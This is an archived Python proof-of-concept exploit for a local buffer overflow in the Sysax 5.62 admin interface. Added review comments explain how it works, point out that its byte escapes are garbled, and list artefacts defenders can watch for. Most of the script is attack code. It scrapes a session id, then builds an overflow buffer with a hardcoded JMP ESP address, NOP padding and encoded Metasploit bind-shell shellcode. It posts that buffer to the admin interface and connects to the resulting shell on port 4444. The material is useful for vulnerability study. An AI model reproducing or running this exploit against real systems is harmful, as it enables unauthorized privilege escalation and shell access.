
Sysax 5.62 Admin Interface Local Buffer Overflow

Posted on 20 June 2012

#!/usr/bin/python
##########################################################################################################
#Title: Sysax <= 5.62 Admin Interface Local Buffer Overflow
#Author: Craig Freyman (@cd1zz)
#Tested on: XP SP3 32bit
#Date Discovered: June 15, 2012
#Vendor Contacted: June 19, 2012
#Details: http://www.pwnag3.com/2012/06/sysax-admin-interface-local-priv.html
##########################################################################################################
#
# NOTE(review): archival proof-of-concept, Python 2 syntax (print statement,
# "except Exception, e"). The listing as reproduced here has lost characters
# in extraction (the byte-string escapes read "x90" rather than "\x90" and
# the HTTP header line terminators are missing), so it is kept as reference
# material for understanding the advisory, not as a runnable script.
#
# Flow: main() fetches the admin page on 127.0.0.1:88 and pulls a 40-character
# session id out of it; exploit() posts an oversized base64 "e2" form field to
# /scgi?sid=...&pid=scriptpathbrowse2.htm and then connects to TCP 4444.
# For defenders, the observable artefacts are that POST (a multi-hundred-byte
# base64 "e2" value to that pid) and a new listener on local port 4444.

import socket,sys,time,re,base64,subprocess

def main():
    # Fetch the admin interface landing page and extract the session id (sid).
    # Reads the module globals `target` and `port`, which are assigned in the
    # __main__ block below; sets the module global `sid` for exploit().
    # `login` is declared global but is only used inside this function.
    global login
    print " "
    print "****************************************************************************"
    print " Sysax <= 5.62 Admin Interface Local Buffer Overflow "
    print " by @cd1zz www.pwnag3.com "
    print "****************************************************************************"

    #initial GET
    # Raw HTTP/1.1 request built by string concatenation; the CRLF terminators
    # between header lines are not present in this reproduction of the listing.
    login = "GET /scgi? HTTP/1.1 "
    login +="Host: localhost:88 "
    login += "Referer: http://localhost:88 "

    try:
        r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        r.connect((target, port))
        print "[+] Accessing admin interface"
        r.send(login)
    except Exception, e:
        # NOTE(review): the error is printed but execution continues into the
        # recv loop below with a socket that never connected (or was never
        # created if socket() itself raised), so a failure here surfaces later
        # as a secondary error rather than a clean exit.
        print "[-] There was a problem"
        print e

    #loop the recv sock so we get the full page
    # NOTE(review): no timeout and no check for an empty recv() (peer closed),
    # so if the response never contains "</html>" this loop does not terminate.
    page = ''
    fullpage = ''
    while "</html>" not in fullpage:
        page = r.recv(4096)
        fullpage += page
        time.sleep(1)

    #regex the sid from the page
    # Matches the literal "sid=" followed by exactly 40 alphanumerics; the
    # whole match (including the "sid=" prefix) is reused verbatim in the
    # query string of the POST built in exploit().
    global sid
    sid = re.search(r'sid=[a-zA-Z0-9]{40}',fullpage,re.M)
    if sid is None:
        print "[-] There was a problem finding your SID"
        sys.exit(1)
    time.sleep(1)
    r.close()

def exploit():
    # Build and send the overflowing POST, then attach to the resulting
    # listener. Reads the module globals `sid` (set by main()), `target` and
    # `port` (set in the __main__ block).
    #
    #msfpayload windows/shell_bind_tcp LPORT=4444 R | msfencode -e x86/shikata_ga_nai -b "x00x0ax0d"
    # Per the author's comment above: a Metasploit bind-shell payload for TCP
    # 4444, encoded to avoid NUL, LF and CR bytes. Escapes are garbled in this
    # reproduction (see header note).
    shell = (
    "xdbxd5xd9x74x24xf4xb8xc3x8fxb3x3ex5bx33xc9"
    "xb1x56x31x43x18x03x43x18x83xebx3fx6dx46xc2"
    "x57xfbxa9x3bxa7x9cx20xdex96x8ex57xaax8ax1e"
    "x13xfex26xd4x71xebxbdx98x5dx1cx76x16xb8x13"
    "x87x96x04xffx4bxb8xf8x02x9fx1axc0xccxd2x5b"
    "x05x30x1cx09xdex3ex8exbex6bx02x12xbexbbx08"
    "x2axb8xbexcfxdex72xc0x1fx4ex08x8ax87xe5x56"
    "x2bxb9x2ax85x17xf0x47x7exe3x03x81x4ex0cx32"
    "xedx1dx33xfaxe0x5cx73x3dx1ax2bx8fx3dxa7x2c"
    "x54x3fx73xb8x49xe7xf0x1axaax19xd5xfdx39x15"
    "x92x8ax66x3ax25x5ex1dx46xaex61xf2xcexf4x45"
    "xd6x8bxafxe4x4fx76x1ex18x8fxdexffxbcxdbxcd"
    "x14xc6x81x99xd9xf5x39x5ax75x8dx4ax68xdax25"
    "xc5xc0x93xe3x12x26x8ex54x8cxd9x30xa5x84x1d"
    "x64xf5xbexb4x04x9ex3ex38xd1x31x6fx96x89xf1"
    "xdfx56x79x9ax35x59xa6xbax35xb3xd1xfcxfbxe7"
    "xb2x6axfex17x25x37x77xf1x2fxd7xd1xa9xc7x15"
    "x06x62x70x65x6cxdex29xf1x38x08xedxfexb8x1e"
    "x5ex52x10xc9x14xb8xa5xe8x2bx95x8dx63x14x7e"
    "x47x1axd7x1ex58x37x8fx83xcbxdcx4fxcdxf7x4a"
    "x18x9axc6x82xccx36x70x3dxf2xcaxe4x06xb6x10"
    "xd5x89x37xd4x61xaex27x20x69xeax13xfcx3cxa4"
    "xcdxbax96x06xa7x14x44xc1x2fxe0xa6xd2x29xed"
    "xe2xa4xd5x5cx5bxf1xeax51x0bxf5x93x8fxabxfa"
    "x4ex14xdbxb0xd2x3dx74x1dx87x7fx19x9ex72x43"
    "x24x1dx76x3cxd3x3dxf3x39x9fxf9xe8x33xb0x6f"
    "x0exe7xb1xa5")

    # 20-byte padding placed on both sides of the shellcode.
    nops = "x90" * 20

    #7CA7A787 FFE4 JMP ESP shell32.dll v6.00.2900.6072
    # Return address taken from a specific shell32.dll build (see the author's
    # comment); the PoC is therefore tied to that exact DLL version, which is
    # consistent with the "Tested on: XP SP3 32bit" note in the header.
    jmp_esp = "x87xA7xA7x7C"

    # Form value layout: 392 filler bytes, 4-byte address, padding, shellcode,
    # padding; the whole buffer is base64-encoded before being sent.
    payload = base64.b64encode(("A" * 392 + jmp_esp + nops + shell + nops))

    #setup exploit
    # Content-Length is the encoded body plus 3 for the "e2=" prefix. As in
    # main(), the CRLF separators are absent in this reproduction.
    exploit = "POST /scgi?"+str(sid.group(0))+"&pid=scriptpathbrowse2.htm HTTP/1.1 "
    exploit += "Host: localhost:88 "
    exploit += "Content-Type: application/x-www-form-urlencoded "
    exploit += "Content-Length: "+ str(len(payload)+3)+" "
    exploit += "e2="+payload+" "

    try:
        r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        r.connect((target, port))
        print "[+] Sending pwnag3"
        r.send(exploit)
    except Exception, e:
        # NOTE(review): as in main(), the failure is reported but not acted
        # on; the script still proceeds to spawn telnet below.
        print "[-] There was a problem"
        print e

    # Hands the terminal to an interactive telnet session on the bind port
    # (shell=True with a fixed command string; no user input reaches it).
    time.sleep(2)
    print "[+] Here is your shell..."
    subprocess.Popen("telnet localhost 4444", shell=True).wait()
    sys.exit(1)

if __name__ == '__main__':
    # No command-line arguments are accepted; any argument prints usage.
    # NOTE(review): the usage string contains "%s" but no value is formatted
    # into it, so it is printed literally.
    if len(sys.argv) != 1:
        print "[-] Usage: %s"
        sys.exit(1)

    #by default it binds to 127.0.0.1 on 88
    # Module globals read by main() and exploit(): the admin interface is only
    # addressed on the loopback interface, matching the "Local" in the title.
    target = "127.0.0.1"
    port = 88
    main()
    exploit()

 
